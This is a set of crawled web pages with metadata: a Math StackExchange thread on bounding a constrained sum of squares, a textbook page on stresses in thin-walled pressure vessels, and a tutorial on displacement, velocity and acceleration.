{"ft_lang_label":"__label__en","ft_lang_prob":0.8774611,"math_prob":0.9021373,"size":563,"snap":"2019-13-2019-22","text_gpt3_token_len":103,"char_repetition_ratio":0.18962432,"word_repetition_ratio":0.09756097,"special_character_ratio":0.1793961,"punctuation_ratio":0.114583336,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95470065,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12],"im_url_duplicate_count":[null,null,null,1,null,1,null,1,null,1,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-05-24T11:03:58Z\",\"WARC-Record-ID\":\"<urn:uuid:5927da64-9c2d-4d1d-b7f5-b3f26fcf0403>\",\"Content-Length\":\"252492\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b955e98c-9cb6-4782-b554-0e96b35cf483>\",\"WARC-Concurrent-To\":\"<urn:uuid:dc160076-8780-4ba8-9dc4-c9ef0780d357>\",\"WARC-IP-Address\":\"52.84.129.246\",\"WARC-Target-URI\":\"https://www.chegg.com/homework-help/changing-order-integration-spherical-coordinates-previous-in-chapter-15.7-problem-29e-solution-9780321730787-exc\",\"WARC-Payload-Digest\":\"sha1:HKYI4NOURJWRCK22TD3FTPELGRMY3IEK\",\"WARC-Block-Digest\":\"sha1:SKG6HWCWP5P3YAWY2FPS6XPW725R7RBN\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-22/CC-MAIN-2019-22_segments_1558232257605.76_warc_CC-MAIN-20190524104501-20190524130501-00130.warc.gz\"}"}
https://math.stackexchange.com/questions/3338738/minimum-and-maximum-sum-of-squares-given-constraints
[ "# Minimum and maximum sum of squares given constraints\n\nSay that we know that $$\\sum_{i=1}^n x_i = x_1+x_2+...+x_n = 1$$ for some positive integer $$n$$, with $$x_1 \\le x_2 \\le x_3 \\le ... \\le x_n$$. The values of $$x_1$$ and $$x_n$$ are also known. How can the minimum and maximum values of $$\\sum_{i=1}^n x_i^2$$ be found?\n\nMy attempt:\n\nI found the minimum value by setting all the $$x_i$$ other than $$x_1$$ and $$x_n$$ equal to each other. This means that $$(n-2)x_i + x_1 + x_n = 1 \\rightarrow x_i = \\frac{1-x_1-x_n}{n-2}$$. Therefore, $$\\sum_{i=1}^n x_i^2 = \\frac{(1-x_1-x_n)^2}{n-2}+x_1^2+x_n^2$$\n\nHowever, I do not know how to find the maximum. The hard part is that $$x_1 \\le x_i \\le x_n$$ must be satisfied.\n\n• $x_1$ and $x_n$ are known and fixed. Aug 30, 2019 at 4:06\n• by the maximum principle, the maximum of a convex function over a bounded polyhedral set occurs at an extreme point of that set Sep 4, 2019 at 6:20\n• In 1981 Slater has proved an interesting companion inequality to Jensen’s inequality. Theorem : Suppose that $\\phi:I\\subseteq \\mathbb{R} \\to \\mathbb{R}$ is increasing convex function on interval $I$ for $x_1$,$x_2$,$\\cdots$,$x_n$ $\\in$ $I^{°}$ (where $I^{°}$ is the interior of the interval $I$) and for $p_1$,$p_2$,$\\cdots$,$p_n$$\\geq 0 withP_n=\\sum_{i=1}^{n}p_i>0 if \\sum_{i=1}^{n}p_i\\phi'_{+}(x_i)>0, then :$$\\frac{1}{P_n}\\sum_{i=1}^{n}p_i\\phi(x_i)\\leq\\phi\\Big(\\frac{\\sum_{i=1}^{n}p_i\\phi'_{+}(x_i)x_i}{\\sum_{i=1}^{n}p_i\\phi'_{+}(x_i)}\\Big)$$Sep 6, 2019 at 12:22 ## 2 Answers For the maximum: Suppose we have fixed values $$x_1 \\leq \\frac{1}{n}$$ and $$x_n \\geq \\frac{1}{n}$$. Then there is a unique point $$x^*=(x_1, x_2, \\dots, x_n)$$ satisfying $$\\sum x_i=1$$ with at most one index $$j$$ satisfying $$x_1 < x_j < x_n$$ (imagine starting with all the variables equal to $$x_1$$, then increasing them one by one to $$x_n$$). I claim this is where the unique maximum of your function is. Consider any other point in the domain, and suppose it has $$x_1 for some $$i \\neq j$$. Let $$\\epsilon = \\min\\{x_i-x_1, x_n-x_j\\}$$. Replacing $$x_i$$ by $$x_i'=x_i-\\epsilon$$ and $$x_j$$ by $$x_j'=x_j+\\epsilon$$ maintains the $$\\sum x_i=1$$ constraint, while decreasing the number of \"interior to $$(x_1, x_n)$$\" variables by one. Furthermore, the new point is better for our objective function: In the sum of squares objective we've replaced $$x_i^2+x_j^2$$ by $$x_i'^2+x_j'^2=(x_i-\\epsilon)^2+(x_j+\\epsilon)^2 = x_i^2+x_j^2 + 2 \\epsilon^2 + 2 \\epsilon(x_j-x_i) > x_i^2+x_j^2.$$ Repeatedly following this process, we'll eventually reach the point $$x^*$$ from our arbitrary point, increasing the objective at every step. The key idea hiding in the background here is that (as Michael Rozenberg noted) the function $$x^2$$ is convex. So if we want to maximize $$\\sum x_i^2$$ given a fixed $$\\sum x_i$$, we want to push the variables as far away from each other as possible. The $$x_1$$ and $$x_n$$ constraints place limits on this, so effectively what ends up happening is we push points out to the boundary until we can't push them out any further. The minimum you observed is the reverse of this: To minimize the sum of a convex function for fixed $$\\sum x_i$$ we push all the inputs together as much as possible (this corresponds to Jensen's Inequality). • Nice argument, very clear. Thanks! – user169852 Sep 7, 2019 at 23:42 • I'm not sure I understand this correctly - does this mean that all$x_i$will be equal to$x_1$or$x_n$except for one? Sep 17, 2019 at 1:13 • @automaticallyGenerated Yes. Exactly how many are equal to$x_1$will depend on where$1$is located relative to$nx_1$and$nx_n$. Sep 17, 2019 at 6:12 $$f(x)=x^2$$ is a convex function. Also, $$(x_1+x_2+...+x_{n-1}-(n-2)x_1,x_1,...,x_1)\\succ(x_{n-1},x_{n-2},...,x_1)$$ and let $$x_n\\geq x_1+x_2+...+x_{n-1}-(n-2)x_1.$$ Thus, by Karamata $$(x_1+x_2+...+x_{n-1}-(n-2)x_1)^2+x_1^2+...+x_1^2\\geq x_{n-1}^2+...+x_1^2,$$ which gives $$\\max\\sum_{k=1}^nx_k^2=(n-2)x_1^2+x_n^2+(1-x_n-(n-2)x_1)^2.$$ Id est, it's enough to solve our problem for $$x_1\\leq x_n or $$x_1\\leq x_n<\\frac{1-(n-2)x_1}{2}.$$ I hope it will help. The minimum we can get by C-S: $$\\sum_{k=1}^nx_k^2=x_1^2+x_n^2+\\frac{1}{n-2}\\sum_{k=1}^{n-2}1^2\\sum_{k=2}^{n-1}x_k^2\\geq x_1^2+x_n^2+\\frac{1}{n-2}\\left(\\sum_{k=2}^{n-1}x_k\\right)^2=$$ $$=x_1^2+x_n^2+\\frac{(1-x_1-x_n)^2}{n-2}.$$ The equality occurs for $$x_2=...=x_{n-1}=\\frac{1-x_1-x_n}{n-2},$$ which says that we got a minimal value. • The Karamata solution is cool, but does it satisfy$x_{n-1} \\leq x_n$? If I'm reading the solution right, we have$x_{n-1} = 1 - x_n - (n-2)x_1$. Is this always$\\leq x_n\\$?\n– user169852\nAug 30, 2019 at 5:07\n• @Bungo I see now. There is a problem with occurring of the equality. Aug 30, 2019 at 5:44" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.85531145,"math_prob":1.0000063,"size":1739,"snap":"2023-40-2023-50","text_gpt3_token_len":522,"char_repetition_ratio":0.10201729,"word_repetition_ratio":0.0,"special_character_ratio":0.30879816,"punctuation_ratio":0.081871346,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":1.0000098,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-28T01:42:34Z\",\"WARC-Record-ID\":\"<urn:uuid:6de472bd-77f6-4739-8cd5-901d857357ce>\",\"Content-Length\":\"164380\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d8b01dd6-c3e8-4820-b16d-2764f71156b1>\",\"WARC-Concurrent-To\":\"<urn:uuid:6f53b66e-a8b1-40ad-af79-30e778617874>\",\"WARC-IP-Address\":\"104.18.11.86\",\"WARC-Target-URI\":\"https://math.stackexchange.com/questions/3338738/minimum-and-maximum-sum-of-squares-given-constraints\",\"WARC-Payload-Digest\":\"sha1:AEJFGY3APYTSK6K3JGYVOVIATC4NFAGJ\",\"WARC-Block-Digest\":\"sha1:KDY3UZI6LIBFYIQOYLT5W6EKL4UZED27\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233510334.9_warc_CC-MAIN-20230927235044-20230928025044-00786.warc.gz\"}"}
http://ecoursesbook.com/cgi-bin/ebook.cgi?topic=me&chap_sec=07.5&page=theory
[ "", null, "Ch 7. Stress Analysis Multimedia Engineering Mechanics PlaneStress PrincipalStresses Mohr's Circlefor Stress Failure PressureVessels\n Chapter 1. Stress/Strain 2. Torsion 3. Beam Shr/Moment 4. Beam Stresses 5. Beam Deflections 6. Beam-Advanced 7. Stress Analysis 8. Strain Analysis 9. Columns Appendix Basic Math Units Basic Equations Sections Material Properties Structural Shapes Beam Equations Search eBooks Dynamics Fluids Math Mechanics Statics Thermodynamics Author(s): Kurt Gramoll ©Kurt Gramoll", null, "MECHANICS - THEORY\n\nThin-walled Pressure Vessels", null, "Cylindrical Pressure Vessel with\nInternal Pressure\n\nBoth cylinderical and spherical pressure vessels are common structures that are used ranging from large gas storage structures to small compressed air tanks in industrial equipment. In this section, only thin-walled pressure vessels will be analyzed.\n\nA pressure vessel is assumed to be thin-walled if the wall thickness is less than 10% of the radius (r/t > 10). This condition assumes that the pressure load will be transfered into the shell as pure tension (or compression) without any bending. Thin-walled pressure vessels are also known as shell structures and are efficient storage structures.\n\nIf the outside pressure is greater than the inside pressure, the shell could also fail due to buckling. This is an advanced topic and is not considered in this section.\n\nCylindrical Pressure Vessels", null, "Cylindrical Vessels will Expierence\nBoth Hoop and Axial Stress in\nthe Mid-section\n\nOnly the middle cylindrical section of a cylinder pressure vessel is examined in this section. The joint between the end caps and the mid-section will have complex stresses that are beyond the discussion in this chapter.\n\nIn the mid-section, the pressure will cause the vessel to expand or strain in only the axial (or longitudinal) and the hoop (or circumferential) directions. There will be no twisting or shear strains. Thus, there will only be the hoop stress, σh and the axial stress, σa. as shown in the diagram at the left.", null, "Cross Section Cut of\nCylindrical Vessel\n\nPressure vessels can be analyzed by cutting them into two sections, and then equating the pressure load at the cut with the stress load in the thin walls. In the axial direction, the axial pressure from the discarded sections will produce a total axial force of p(πr2) which is simply the cross section area times the internal pressure. It is generally assumed that r is the inside radius.\n\nThe axial force is resisted by the axial stress in the vessel walls which have a thickness of t. The total axial load in the walls will be σa(2πrt). Since the cross section is in equilbrium, the two axial forces must be equal, giving\n\np(πr2) = σa(2πrt)\n\nThis can be simplified to", null, "where r is the inside radius and t is the wall thickness.", null, "Hoop Section Cut from\nCylindrical Vessel\n\nIn addition to the axial stress, there will be a hoop stress around the circumference. The hoop stress, σh, can be determined by taking a vertical hoop section that has a width of dx. The total horizontal pressure load pushing against the section will be p(2r dx) as shown in the diagram.\n\nThe top and bottom edge section will resist the pressure and exert a load of σh(t dx) (each edge). The edge loads have to equal the pressure load, or\n\np(2r dx) =σh(2t dx)\n\nThis can be simplified to", null, "where r is the inside radius and t is the wall thickness.\n\nSpherical Pressure Vessel", null, "Spherical Pressure Vessel\nCut in Half\n\nA spherical pressure vessel is really just a special case of a cylinderical vessel. No matter how the a sphere is cut in half, the pressure load perpendicular to the cut must equal the shell stress load. This is the same situation with the axial direction in a cylindrical vessel. Equating the to loads give,\n\np(πr2) = σh(2πrt)\n\nThis can be simplified to", null, "Notice, the hoop and axial stress are the same due to symmetry.\n\nPractice Homework and Test problems now available in the 'Eng Mechanics' mobile app\nIncludes over 400 problems with complete detailed solutions.\nAvailable now at the Google Play Store and Apple App Store." ]
[ null, "http://ecoursesbook.com/general/ecourses.gif", null, "http://ecoursesbook.com/general/cc_by_nc_nd.png", null, "http://ecoursesbook.com/ebook/mechanics/ch07/sec075/media/d7621.gif", null, "http://ecoursesbook.com/ebook/mechanics/ch07/sec075/media/d7622.gif", null, "http://ecoursesbook.com/ebook/mechanics/ch07/sec075/media/d7623.gif", null, "http://ecoursesbook.com/ebook/mechanics/ch07/sec075/media/eq7621.gif", null, "http://ecoursesbook.com/ebook/mechanics/ch07/sec075/media/d7624.gif", null, "http://ecoursesbook.com/ebook/mechanics/ch07/sec075/media/eq7622.gif", null, "http://ecoursesbook.com/ebook/mechanics/ch07/sec075/media/d7625.gif", null, "http://ecoursesbook.com/ebook/mechanics/ch07/sec075/media/eq7623.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.893524,"math_prob":0.9445239,"size":3414,"snap":"2021-31-2021-39","text_gpt3_token_len":788,"char_repetition_ratio":0.1718475,"word_repetition_ratio":0.06467662,"special_character_ratio":0.2208553,"punctuation_ratio":0.071428575,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98265517,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20],"im_url_duplicate_count":[null,null,null,null,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-25T02:38:59Z\",\"WARC-Record-ID\":\"<urn:uuid:5eacd17f-0782-4736-a3fb-552cb12ab505>\",\"Content-Length\":\"14058\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5b9c6be5-b1c5-4fef-98c5-802841ac770b>\",\"WARC-Concurrent-To\":\"<urn:uuid:4d57e765-2d43-42c4-9769-f58baa44d8c1>\",\"WARC-IP-Address\":\"205.144.171.156\",\"WARC-Target-URI\":\"http://ecoursesbook.com/cgi-bin/ebook.cgi?topic=me&chap_sec=07.5&page=theory\",\"WARC-Payload-Digest\":\"sha1:FM77I2GNKSKXCD27XI245S7JCBVSZMGV\",\"WARC-Block-Digest\":\"sha1:BA2YYZXCNONKSZXK4DEOEFXIC7DXANFB\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780057589.14_warc_CC-MAIN-20210925021713-20210925051713-00027.warc.gz\"}"}
https://discuss.mxnet.apache.org/t/nlp-prediction-using-a-cnn-pretrained-model/280
[ "", null, "# NLP prediction using a CNN pretrained model\n\nHi,\n\nFollowing the tutorial posted here https://mxnet.incubator.apache.org/tutorials/nlp/cnn.html I tried loading the model from the checkpoint for the purpose of using it to make predictions on single samples of text (in other words, batches of 1 sample). However, because the model is trained on a batch of size 50, I have problems loading the model.\n\n``````sym, arg_params, aux_params = mx.model.load_checkpoint('cnn', 3)\nmod = mx.mod.Module(symbol=sym, context=mx.cpu(), label_names=None)\nmod.bind(for_training=False, data_shapes=[('data', (1,56))],\nlabel_shapes=mod._label_shapes)\nmod.set_params(arg_params, aux_params, allow_missing=True)\n``````\n\nThe above code breaks with:\n\n``````data: (1, 56)\nError in operator reshape0: [20:32:53] src/operator/tensor/./matrix_op-inl.h:179: Check failed: oshape.Size() == dshape.Size() Target shape size is different to source. Target: 840000\nSource: 16800\n``````\n\nThis is because the CNN model has several `Reshape` layers which are configured based on the batch size:\n\n`conv_input = mx.sym.Reshape(data=embed_layer, target_shape=(batch_size, 1, sentence_size, num_embed))`\n\nThe questions is how can I load the model and use it for predicting on one sample of text? I do not want to train with a batch size of 1, because that is not optimal.\n\nIf the network architecture is related to batch size, you may need to feed in the corresponding batch size of data. A possible solution is to repeat your input data 50 times and composes (50, 56) data shape.\n\n1 Like\n\nThat is indeed a way of solving the issue and I have actually tried it, alas I don’t think it is elegant to brute force my way into using the model\n\nI face the same problem. Is there another solution than repeating the data to get the same size as the batch_size?" ]
[ null, "https://aws1.discourse-cdn.com/business4/uploads/mxnet/original/1X/3d10efb26d5e71b44832c33bc092f6a2711134bb.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8388131,"math_prob":0.9138687,"size":1248,"snap":"2020-34-2020-40","text_gpt3_token_len":315,"char_repetition_ratio":0.10369775,"word_repetition_ratio":0.0,"special_character_ratio":0.2636218,"punctuation_ratio":0.21705426,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9841743,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-29T08:53:40Z\",\"WARC-Record-ID\":\"<urn:uuid:7aa8da72-5f05-494f-a7fb-64eed4343140>\",\"Content-Length\":\"20504\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:25c8f8d7-778d-4090-afc6-f5faea6509ef>\",\"WARC-Concurrent-To\":\"<urn:uuid:2eb4c4c2-df90-47b2-b6f2-21b642d0b10b>\",\"WARC-IP-Address\":\"72.52.80.15\",\"WARC-Target-URI\":\"https://discuss.mxnet.apache.org/t/nlp-prediction-using-a-cnn-pretrained-model/280\",\"WARC-Payload-Digest\":\"sha1:F2YE43OZ64GAGOK3OB7GUC2QWZR672N6\",\"WARC-Block-Digest\":\"sha1:YQOLUOT4H3WQPGW5UVQMXCG3GYLYAGTS\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600401632671.79_warc_CC-MAIN-20200929060555-20200929090555-00593.warc.gz\"}"}
https://mathhelpboards.com/threads/fraction-problem.7334/
[ "# Fraction Problem\n\n#### kuheli\n\n##### New member\nif b is the mean proportion between a and c ; prove that\n\n(a^2 - b^2 + c^2) / (a^-2 - b^-2 + c^-2) = b^4\n\n#### Petrus\n\n##### Well-known member\nRe: please help with this fraction problem\n\nif b is the mean proportion between a and c ; prove that\n\n(a^2 - b^2 + c^2) / (a^-2 - b^-2 + c^-2) = b^4\nHello,\nDo you got any progress?\ndo you know what they mean with \"b is the mean proportion between a and c\"\n$$\\displaystyle b^2=ac$$ put that on left side what do you got?\n\nRegards,\n$$\\displaystyle |\\pi\\rangle$$\n\n#### kuheli\n\n##### New member\nya i got it .. thanks a lot", null, "" ]
[ null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.866656,"math_prob":0.9922414,"size":170,"snap":"2021-04-2021-17","text_gpt3_token_len":70,"char_repetition_ratio":0.09638554,"word_repetition_ratio":0.0,"special_character_ratio":0.5,"punctuation_ratio":0.069767445,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9996401,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-19T06:51:07Z\",\"WARC-Record-ID\":\"<urn:uuid:00f66e3b-38b6-41e6-906a-9bd56c05b444>\",\"Content-Length\":\"59193\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c3b3ae3f-e655-43ae-b1ab-8d38dac67db9>\",\"WARC-Concurrent-To\":\"<urn:uuid:0f33a730-82a7-46de-9b4f-5f9f2476ecf6>\",\"WARC-IP-Address\":\"50.31.99.218\",\"WARC-Target-URI\":\"https://mathhelpboards.com/threads/fraction-problem.7334/\",\"WARC-Payload-Digest\":\"sha1:6NP5BJX37LDKCHUNJ7VCZKCRCKG5XF74\",\"WARC-Block-Digest\":\"sha1:JEDI3IGQB5DP3CNPFMQKRGVWYGRW7PIK\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618038878326.67_warc_CC-MAIN-20210419045820-20210419075820-00436.warc.gz\"}"}
https://mathsathome.com/displacement-velocity-acceleration/
[ "# How to Find Displacement, Velocity and Acceleration\n\n## Definitions of Displacement, Velocity, Acceleration and Jerk\n\nDisplacement is a vector quantity that is defined as the shortest distance between the initial and final position of an object. Distance is a scalar quantity and is the length of the total path taken by an object. Distance is only measured as a positive value whereas displacement is measured in both positive and negative directions.\n\nIf a car drives 10m in one direction and then immediately drives 10m in the opposite direction back to its starting location, the total distance travelled by the car will be 20m. However, the total displacement of the car will be zero as its final position is now the same as its initial location.\n\nSpeed is a scalar quantity and is defined as the distance travelled per unit time. Velocity is a vector quantity and is defined as the displacement travelled per unit time. Velocity must also have a direction. A negative velocity means that the object is traveling in the opposite direction to the positive direction.\n\nOften, a positive velocity refers to an object travelling in the forwards direction, whilst a negative velocity is used to describe an object travelling in the backwards direction.\n\nIf an object has zero velocity, either it is stationary or it is reversing its direction of travel.\n\nSpeed is the rate of change of distance with time, whereas velocity is the rate of change of displacement with time.\n\nSpeed is not a vector quantity. This means that it is not described by a direction. An object travelling at 10ms-1 forwards has the same speed as an object travelling at 10ms-1 backwards. Despite having different velocities, their speeds are equal.\n\nAcceleration is the rate of change of velocity. It is a vector quantity, which means that it has a magnitude and direction. If an object has zero acceleration, its velocity does not change.\n\nAn object undergoes acceleration if it speeds up, slows down or changes direction.\n\nIn kinematics, jerk is the rate of change of acceleration with respect to time. It is a vector quantity. Jerk is the derivative of acceleration and has the units m/s3.\n\nJerk is the third derivative of displacement with respect to time. Snap, crackle and pop are the fourth, fifth and sixth derivatives of displacement respectively. Snap, crackle and pop are named after the Rice Krispies mascots and have little practical use.\n\nThe standard units of displacement are metres (m). Velocity has the units of metres per second (ms-1) and acceleration has the units of metres per second squared (ms-2).\n\n## The Relationship Between Displacement, Velocity and Acceleration\n\nThe equation for the instantaneous velocity of a particle can be found by differentiating the displacement equation with respect to time. The equation for the instantaneous acceleration of a particle can be found by differentiating the velocity equation with respect to time. Velocity is the first derivative of displacement and acceleration is the second derivative.\n\n### How to find Velocity and Acceleration by Differentiating Displacement\n\nExample 1: The displacement of a particle from an origin is given by", null, ", where t is the time in seconds.\n\nFind expressions for the velocity and acceleration.\n\nThe velocity equation is found by differentiating the displacement equation with respect to time.\n\nThe displacement equation is", null, ".\n\nDifferentiating, the velocity equation is", null, ".\n\nThe acceleration equation is found by differentiating the velocity equation with respect to time.\n\nDifferentiating, the acceleration equation is", null, ".\n\nFind the velocity after 2 seconds\n\nSince velocity is required, the velocity equation of", null, "is considered.\n\nWe simply substitute t=2 into this equation to find the velocity after 2 seconds.", null, "", null, "Example 2: The displacement of a a particle from an origin is given by", null, ", where t is the time in seconds.\n\nFind expressions for the velocity and acceleration.\n\nDifferentiating the displacement equation with respect to time,", null, ".\n\nDifferentiating the velocity equation with respect to time,", null, ".\n\nFind the displacement when the acceleration is 16ms-2.\n\nIn this question, we first must find the time at which the acceleration is equal to 16.", null, "and so, setting the acceleration to 16 we obtain", null, ".\n\nSolving for time, we obtain t = 2 seconds. Therefore the acceleration is 16ms-2 after 2 seconds.\n\nNow we substitute t=2 into the displacement equation to obtain the answer.", null, "and", null, "which equals 6m.\n\n### Finding Displacement by Integrating Velocity\n\nTo find the displacement equation, integrate the velocity equation with respect to time. The constant of integration can be found by substituting any initial conditions into the displacement equation.\n\nExample 1: The velocity of a particle is given by", null, ". Find the equation for the displacement of the particle if it was at the origin initially.\n\nThe displacement of the particle is found by integrating the velocity equation.", null, "and so,", null, ".\n\nTherefore the displacement is given by", null, ", where C is the constant of integration.\n\nTo find the value of C, we substitute in a known displacement. We know that the particle was at the origin initially. This means that the displacement was zero when the time was zero.\n\nSubstituting s(0)=0, the equation becomes", null, "and so, C= 0.\n\nTherefore the displacement equation is just", null, "m.\n\nFind the displacement after 1 second.\n\nIn this question, we simply substitute a time of t=1 into the displacement equation that we have just found.", null, "and so,", null, ".", null, "and so, the displacement is 4 metres after 1 second.\n\nExample 2: Find the displacement of a particle with acceleration", null, "if it is initially 2 m to the right of the origin, travelling at 1ms-1.\n\nTo find the velocity, integrate the acceleration equation.", null, ".", null, "and so,", null, ".\n\nWe know that the particle is moving 1ms-1 when the time equals zero.", null, "and therefore,", null, ".\n\nThe velocity equation is", null, ".\n\nTo find the displacement equation, integrate the velocity equation.", null, "and so,", null, ".", null, ".\n\nWe know that the particle starts 2 metres away from the origin initially. This means that when time equals zero, the displacement is 2.\n\nTherefore", null, "and so,", null, ".\n\nTherefore the displacement equation is", null, ".\n\n## Displacement from the Velocity-Time Graph\n\nThe displacement of an object is equal to the area between the line of a velocity-time graph and the axis. Where the graph is above the axis, the displacement is positive. Where the graph is below the axis, the displacement is negative.\n\nFor example, the displacement can be found for the velocity-time graph below by finding the area between the graph and the time axis.\n\nThe displacement is the integral of velocity. The area under a curve is found using integration. Therefore the area under the velocity time graph is equal to the displacement.\n\n• In the first 4 seconds, the area is the area of a triangle with a base of 4 and a height of 5.", null, "and so, the displacement in the first 4 seconds is 10 metres.\n\n• Between 4 and 10 seconds, the area is the area of a rectangle with base 6 and height 5.", null, "and so, the displacement between 4 and 10 seconds is 30 metres.\n\nBetween 10 and 16 seconds, the area is the area of a rectangle with base 6 and height 3.", null, "and because this rectangle is below the time axis, this displacement is negative. The displacement between 10 and 16 seconds is -18 metres.\n\nThe total displacement from 0 to 16 seconds is found by finding the sum of the areas from 0 to 16.\n\n10 + 30 – 18 = 22 and so, the displacement is 22 metres.\n\nThe object moved forwards 10 metres then moved forwards a further 30 metres before reversing 18 metres.\n\n## Acceleration from the Velocity-Time Graph\n\nThe acceleration of an object is given by the slope of the velocity-time graph. The size of the gradient between two points on a velocity-time graph is equal to the average acceleration over this time period. The instantaneous acceleration at a particular time is equal to the gradient of the tangent to the velocity-time graph at this point.\n\nThe gradient is calculated as rise over run.\n\nAcceleration is the derivative of velocity. The gradient of a graph is found using differentiation. Therefore the gradient of the velocity-time graph is equal to the acceleration.\n\nFor example, in the first 3 seconds of the velocity-time graph below, the rise is 6 and the run is 3.", null, "and so, the acceleration in the first 3 seconds is 2ms-2.\n\nIn the time from 3 to 10 seconds, the acceleration is zero because the gradient is zero.\n\nFor the regions where the velocity-time graph is horizontal, the acceleration is zero. This is because the gradient is zero.\n\nIn the region from 10 to 14 seconds, the rise is -6 and the run is 4.", null, "and so, the acceleration between 10 and 14 seconds is -1.5ms-2.\n\n## Formulae for Displacement, Velocity and Acceleration\n\nThe formula linking displacement, velocity and acceleration is s=vt-1/2at2, where s is displacement, v is velocity and a is acceleration. This formula works provided the acceleration is constant.\n\nThe equations of motion linking displacement (s), velocity (v), acceleration (a), initial velocity (u) and time (t) are:\n\n• v=u+at\n• s=ut+1/2at2\n• v2=u2+2as\n• s=1/2(u+v)t\n• s=vt-1/2at2\n\n## How to Find Where a Particle Changes Direction\n\nA particle changes direction at the positions where v=0 and a≠0. Set the velocity equation equal to zero and solve for time. If the acceleration at these times is zero, then the particle is stationary. If the acceleration is not equal to zero, then it is changing direction.\n\nFor example, the displacement of a particle from an origin is given by", null, ", where t is the time in seconds.\n\nFind the displacement when the particle changes direction.\n\n1. Find the expression for velocity by differentiating the displacement equation.", null, "2. Set the velocity equation to zero and solve for time\n\n0=2t-6 and so, t=3 seconds.\n\nThe particle reverses direction after 3 seconds.\n\nTo find the displacement of the particle when it changes direction, substitute the time of t=3 into the displacement equation.", null, "and so,", null, ".\n\nThis equals -5 and so, the particle is located at -5 metres from the origin when it turns around." ]
[ null, "https://equatio-api.texthelp.com/svg/s%5Cleft(t%5Cright)%3Dt%5E3-2t%2B3%5C%20m", null, "https://equatio-api.texthelp.com/svg/s%5Cleft(t%5Cright)%3Dt%5E3-2t%2B3", null, "https://equatio-api.texthelp.com/svg/v%5Cleft(t%5Cright)%3D3t%5E2-2", null, "https://equatio-api.texthelp.com/svg/a%5Cleft(t%5Cright)%3D6t", null, "https://equatio-api.texthelp.com/svg/v%5Cleft(t%5Cright)%3D3t%5E2-2", null, "https://equatio-api.texthelp.com/svg/v%5Cleft(2%5Cright)%3D3%5Ctimes%5Cleft(2%5Cright)%5E2-2", null, "https://equatio-api.texthelp.com/svg/v%5Cleft(2%5Cright)%3D10ms%5E%7B-1%7D", null, "https://equatio-api.texthelp.com/svg/s%5Cleft(t%5Cright)%3Dt%5E3%2B2t%5E2-5t%5C%20m", null, "https://equatio-api.texthelp.com/svg/v%5Cleft(t%5Cright)%3D3t%5E2%2B4t-5%5C%20ms%5E%7B-1%7D", null, "https://equatio-api.texthelp.com/svg/a%5Cleft(t%5Cright)%3D6t%2B4%5C%20ms%5E%7B-2%7D", null, "https://equatio-api.texthelp.com/svg/a%5Cleft(t%5Cright)%3D6t%2B4%5C%20", null, "https://equatio-api.texthelp.com/svg/16%3D6t%2B4%5C%20", null, "https://equatio-api.texthelp.com/svg/s%5Cleft(t%5Cright)%3Dt%5E3%2B2t%5E2-5t", null, "https://equatio-api.texthelp.com/svg/s%5Cleft(2%5Cright)%3D%5Cleft(2%5Cright)%5E3%2B2%5Ctimes%5Cleft(2%5Cright)%5E2-5%5Ctimes%5Cleft(2%5Cright)", null, "https://equatio-api.texthelp.com/svg/v%5Cleft(t%5Cright)%3D2t%2B3%5C%20ms%5E%7B-1%7D", null, "https://equatio-api.texthelp.com/svg/s%5Cleft(t%5Cright)%3D%5Cint_%7B%5C%20%7D%5E%7B%5C%20%7Dv%5Cleft(t%5Cright)%5C%20dt", null, "https://equatio-api.texthelp.com/svg/s%5Cleft(t%5Cright)%3D%5Cint_%7B%5C%20%7D%5E%7B%5C%20%7D2t%2B3%5C%20dt", null, "https://equatio-api.texthelp.com/svg/s%5Cleft(t%5Cright)%3Dt%5E2%2B3t%2BC", null, "https://equatio-api.texthelp.com/svg/0%3D%5Cleft(0%5Cright)%5E2%2B3%5Ctimes%5Cleft(0%5Cright)%2BC", null, 